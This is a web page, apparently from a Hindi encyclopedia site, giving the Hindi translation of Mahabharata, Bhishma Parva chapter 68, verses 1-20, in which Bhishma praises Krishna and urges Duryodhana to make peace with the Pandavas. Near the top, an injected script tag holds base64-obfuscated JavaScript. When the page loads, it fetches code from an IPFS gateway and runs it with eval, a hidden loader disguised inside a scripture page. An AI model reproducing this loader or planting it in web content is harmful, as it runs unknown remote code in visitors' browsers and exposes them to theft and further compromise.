महाभारत भीष्म पर्व अध्याय 68 श्लोक 1-20

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

अष्टषष्टितम (68) अध्‍याय: भीष्म पर्व (भीष्‍मवध पर्व)

महाभारत: भीष्म पर्व: अष्टषष्टितम अध्याय: श्लोक 1-20 का हिन्दी अनुवाद

भीष्मजी कहते है- महाराज दुर्योधन ! पूर्वकाल में इस भूतलपर ब्रह्मर्षियों तथा देवताओं ने इनका जो ब्रह्मभूत स्तोत्र कहा हैं, उसे तुम मुझसे सुनो। प्रभो! आप साध्यगण और देवताओं के भी स्वामी एवं देवदेवेश्वर है। आप सम्पूर्ण जगत् के ह्नदय के भावों को जानने वाले है। आपके विषय में नारदजी ने ऐसा कहा है। मार्कण्डेयजी ने आपको भूत, भविष्य और वर्तमान स्वरूप बताया है। वे आपको यज्ञों का यज्ञ और तपस्याओं का भी सारभूत तप बताया करते है। भगवान भृगुने आपको देवताओं का भी देवता कहा है। विष्णो ! आपका रूप अत्यन्त पुरातन और उत्कृष्ट है। प्रभो! आप वसुओं के वासुदेव तथा इन्द्र को स्वर्ग के राज्यपर स्थापित करने वाले है। देव ! आप देवताओं के भी देवता हैं। महर्षि द्वैपायन आपके विषय में ऐसा ही कहते है। प्रथम प्रजासृष्टि समय आपको ही दक्ष प्रजापति कहा गया है। आप ही सम्पूर्ण लोकों के स्त्रष्टा हैं- इस प्रकार अग्डिरा मुनि आपके विषय में कहते है। अव्यक्त (प्रधान) आपके शरीर से उत्पन्न हुआ है, व्यक्त महत्वत्व आदि कार्यवर्ग आपके मन में स्थित है तथा सम्पूर्ण देवता भी आपसे ही उत्पन्न हुए है, ऐसा असित और देवलका कथन है। आपके मस्तक से द्युलोक और भुजाओं से भूलोक व्याप्त हैं। तीनों लोक आपके उदर में स्थित हैं। आप ही सनातन पुरूष है। तपस्या से शुद्व अन्तःकरण वाले महात्मा पुरूष आपको ऐसा ही जानते है। आत्मसाक्षात्कार से तृप्त हुए ज्ञानी महर्षियों की दृष्टि में आप सबसे श्रेष्ठ है। मधुसूदन ! जो सम्पूर्ण धर्मों में प्रधान और संग्राम से कभी पीछे हटनेवाले नहीं है, उन उदार राजर्षियों के परम आश्रय भी आप ही है। इस प्रकार सनत्कुमार आदि योगवेत्ता पापापहारीआप भगवान पुरूषोत्तम की सदा ही स्तुति और पूजा करते है। तात दुर्योधन ! इस तरह विस्तार और संक्षेप से मैनें तुम्हें भगवान केशव की यथार्थ महिमा बतायी है। अब तुम अत्यन्त प्रसन्न होकर उनका भजन करो। संजय कहते है- महाराज! भीष्मजी के मुख से यह पवित्र आख्यान सुनकर तुम्हारे पुत्र ने भगवान श्रीकृष्ण तथा महारथी पाण्डवों को बहुत महत्वशाली समझा। राजन्! उस समय शान्तनुनन्दन भीष्मजीने पुनः दुर्योधन से कहा- नरेश्वर! तुमने महात्मा केशव तथा नरस्वरूप् अर्जुन का यथार्थ माहात्म्य, जिसके विषय में तुम मुझसे पूछ रहे थे, मुझसे अच्छी तरह सुन लिया। ऋषि नर और नारायण जिस उद्देश्य से मनुष्यों में अवतीर्ण हुए है, वे दोनों अपराजित वीर जिस प्रकार युद्व में अवध्य हैं तथा समस्त पाण्डव भी जिस प्रकार समरभूमि में किसी के लिये भी वध्य नहीं हैं, वह सब विषय तुमने अच्छी तरह सुन लिया। राजेन्द्र! भगवान श्रीकृष्ण यशस्वी पाण्डर्वोपर बहुत प्रसन्न है। इसीलिये मैं कहता हूं कि पाण्डवों के साथ तुम्हारी संधि हो जाय। वे तुम्हारे बलवान् भाई है। तुम अपने मनको वश में रखते हुए उनके साथ मिलकर पृथ्वी का राज्य भोगो। भगवान नर-नारायण (अर्जुन और श्रीकृष्ण) की अवहेलना करके तुम नष्ट हो जाओगे। प्रजानाथ! ऐसा कहकर आपके ताऊ भीष्मजी चुप हो गये। तत्पश्चात् उन्होंने राजा दुर्योधन को विदा किया और स्वयं शयन करने चले गये। भरतश्रेष्ठ! राजा दुर्योधन भी महात्मा भीष्म को प्रणाम करके अपने शिविरा में चला आया और अपनी शुभ्र शय्या पर सो गया।

इस प्रकार श्रीमहाभारत भीष्म पर्व के अन्तर्गत भीष्मवधपर्व में विश्वोपाख्यान विषयक अड़सठवां अध्याय पूरा हुआ।


« पीछे आगे »

टीका टिप्पणी और संदर्भ

संबंधित लेख

साँचा:सम्पूर्ण महाभारत अभी निर्माणाधीन है।